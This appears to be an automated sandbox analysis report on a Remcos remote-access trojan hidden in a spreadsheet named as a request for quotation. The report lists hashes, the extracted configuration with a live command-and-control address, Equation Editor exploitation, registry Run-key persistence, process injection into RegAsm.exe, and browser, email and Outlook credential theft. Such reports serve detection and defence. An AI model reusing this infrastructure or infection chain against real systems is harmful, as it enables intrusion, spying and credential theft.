remcos | d483c4f1670ea7a69f9cdbbf716e67f1511e271d485229566afaa67011304dd6

Analysis

max time kernel
149s
max time network
132s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
21-03-2024 08:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ-000753.xla.xls
Size

62KB
MD5

42d3837bf1dc78a79c488153d7ff0ca9
SHA1

40dd20643ba58bb81a27c3be4c37c84cc6a2ce6f
SHA256

d483c4f1670ea7a69f9cdbbf716e67f1511e271d485229566afaa67011304dd6
SHA512

18b9ce199b52a66f7a3666226defaf4ecdecf4293e8fd7bd51f3896e1b0f24d7d7cbe6034a16fd8f43d6c9882888a9612f2b6d73b33dcffa309a6442d7f1373d
SSDEEP

768:UyBP0/+sG1tzXyBP0nApAEhJrOawVkC43+1eaIqnxMsijgO4E9XFzd:U68/pG1tzX68ApAEzrOawaaZus04E9

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

107.172.31.178:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-NVSJ5U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/1604-263-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1604-264-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1604-281-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2008-253-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2008-255-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2008-273-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2008-253-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2008-255-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1604-263-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1604-264-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2128-267-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2128-266-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2128-268-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2008-273-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1604-281-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 7 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

14 1720 EQNEDT32.EXE
18 1648 WScript.exe
20 1648 WScript.exe
22 528 powershell.exe
24 528 powershell.exe
26 528 powershell.exe
27 528 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
14	1720	EQNEDT32.EXE
18	1648	WScript.exe
20	1648	WScript.exe
22	528	powershell.exe
24	528	powershell.exe
26	528	powershell.exe
27	528	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\RMB.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 528 set thread context of 2492	528	powershell.exe	RegAsm.exe
PID 2492 set thread context of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 set thread context of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 set thread context of 2128	2492	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1720 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
1720	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEEXCEL.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2452 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid process

892 powershell.exe
528 powershell.exe
2192 powershell.exe
528 powershell.exe
528 powershell.exe
2008 RegAsm.exe
2008 RegAsm.exe
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

RegAsm.exe

pid process

2492 RegAsm.exe
2492 RegAsm.exe
2492 RegAsm.exe

pid	process
2452	EXCEL.EXE

pid	process
892	powershell.exe
528	powershell.exe
2192	powershell.exe
528	powershell.exe
528	powershell.exe
2008	RegAsm.exe
2008	RegAsm.exe

pid	process
2492	RegAsm.exe
2492	RegAsm.exe
2492	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exeWINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	2128	RegAsm.exe
Token: SeShutdownPrivilege	2596	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

2452 EXCEL.EXE
2452 EXCEL.EXE
2452 EXCEL.EXE
2596 WINWORD.EXE
2596 WINWORD.EXE

pid	process
2452	EXCEL.EXE
2452	EXCEL.EXE
2452	EXCEL.EXE
2596	WINWORD.EXE
2596	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 1720 wrote to memory of 1648	1720	EQNEDT32.EXE	WScript.exe
PID 1720 wrote to memory of 1648	1720	EQNEDT32.EXE	WScript.exe
PID 1720 wrote to memory of 1648	1720	EQNEDT32.EXE	WScript.exe
PID 1720 wrote to memory of 1648	1720	EQNEDT32.EXE	WScript.exe
PID 2596 wrote to memory of 2704	2596	WINWORD.EXE	splwow64.exe
PID 2596 wrote to memory of 2704	2596	WINWORD.EXE	splwow64.exe
PID 2596 wrote to memory of 2704	2596	WINWORD.EXE	splwow64.exe
PID 2596 wrote to memory of 2704	2596	WINWORD.EXE	splwow64.exe
PID 1648 wrote to memory of 892	1648	WScript.exe	powershell.exe
PID 1648 wrote to memory of 892	1648	WScript.exe	powershell.exe
PID 1648 wrote to memory of 892	1648	WScript.exe	powershell.exe
PID 1648 wrote to memory of 892	1648	WScript.exe	powershell.exe
PID 892 wrote to memory of 528	892	powershell.exe	powershell.exe
PID 892 wrote to memory of 528	892	powershell.exe	powershell.exe
PID 892 wrote to memory of 528	892	powershell.exe	powershell.exe
PID 892 wrote to memory of 528	892	powershell.exe	powershell.exe
PID 528 wrote to memory of 2192	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 2192	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 2192	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 2192	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 3004	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 3004	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 3004	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 3004	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 3004	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 3004	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 3004	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 528 wrote to memory of 2492	528	powershell.exe	RegAsm.exe
PID 2492 wrote to memory of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2008	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 1604	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2128	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2128	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2128	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2128	2492	RegAsm.exe	RegAsm.exe
PID 2492 wrote to memory of 2128	2492	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ-000753.xla.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2452

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2596

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2704

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
